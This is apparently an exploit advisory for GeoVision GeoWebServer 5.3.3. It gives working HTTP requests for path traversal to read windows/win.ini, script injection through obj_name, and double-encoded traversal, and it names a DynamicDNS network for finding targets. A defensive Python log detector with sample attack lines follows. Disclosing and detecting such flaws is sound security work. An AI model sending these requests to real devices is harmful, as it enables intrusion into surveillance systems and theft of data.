# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE  
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM  
# Date: 6-16-21 (Vendor Notified)  
# Exploit Author: Ken 's1ngular1ty' Pyle  
# Vendor Homepage:  
# Version: <= 5.3.3  
# Tested on: Windows 20XX / MULTIPLE  
# CVE :  
GEOVISION GEOWEBSERVER versions <= 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code Execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client-side exploitation, including session theft:

ex. obj_name=INJECTEDHTML / XSS

The application also fails to properly enforce permissions and sanitize user requests. This allows for LFI / Remote Code Execution through several vectors:

ex. /Visitor//%252e(path to target)

These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:

Nested Exploitation of the LFI, XSS, HTML / Browser Injection:

GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

Absolute exploitation of the LFI:

POST /Visitor/bin/WebStrings.srf?obj_name=win.ini

GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini

Additionally, the vendor has issued an ineffective / broken patch which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
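The two request shapes above (single-encoded traversal plus HTML in obj_name, and the double-encoded %252e traversal) are what a defender should be hunting for in GeoWebServer access logs. The following Python detector is an added example, not part of the advisory or of any vendor tooling; the log lines it scans are constructed to reproduce the advisory's vectors, and the log format and thresholds are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined-log format, not real
# GeoWebServer output); the request targets mirror the advisory's vectors.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jun/2021:10:01:02 +0000] "GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script> HTTP/1.1" 200 512
10.0.0.5 - - [16/Jun/2021:10:01:03 +0000] "GET /Visitor//%252e%252e%252f%252e%252e%252fwindows\\win.ini HTTP/1.1" 200 403
10.0.0.9 - - [16/Jun/2021:10:01:04 +0000] "GET /Visitor/bin/WebStrings.srf?file=strings.xml&obj_name=lobby HTTP/1.1" 200 2048
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ".." path segment bounded by a slash, backslash, or query delimiter.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/=?&])\.\.(?:[\\/]|$)')
HTML_RE = re.compile(r'<\s*/?\s*(script|iframe|img|svg)\b', re.IGNORECASE)


def fully_decode(s: str, max_rounds: int = 5) -> str:
    """Undo nested percent-encoding (%252e -> %2e -> .) until it stops changing,
    so a double-encoded traversal is inspected in its final decoded form."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target: str) -> list[str]:
    """Return the list of findings for one request target (empty if clean)."""
    decoded = fully_decode(target)
    findings = []
    if TRAVERSAL_RE.search(decoded):
        findings.append("path-traversal")
    if "%25" in target:  # an encoded percent sign means double encoding
        findings.append("double-encoding")
    if HTML_RE.search(decoded):
        findings.append("html-injection")
    return findings


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Scan log text and return (target, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m:
            findings = classify(m.group("target"))
            if findings:
                hits.append((m.group("target"), findings))
    return hits
```

Decoding to a fixed point matters: a rule that decodes only once sees `%2e%2e%2f` rather than `../` for the second vector and misses it.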
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.  
These attacks were disclosed as part of the IOTVillage Presentation: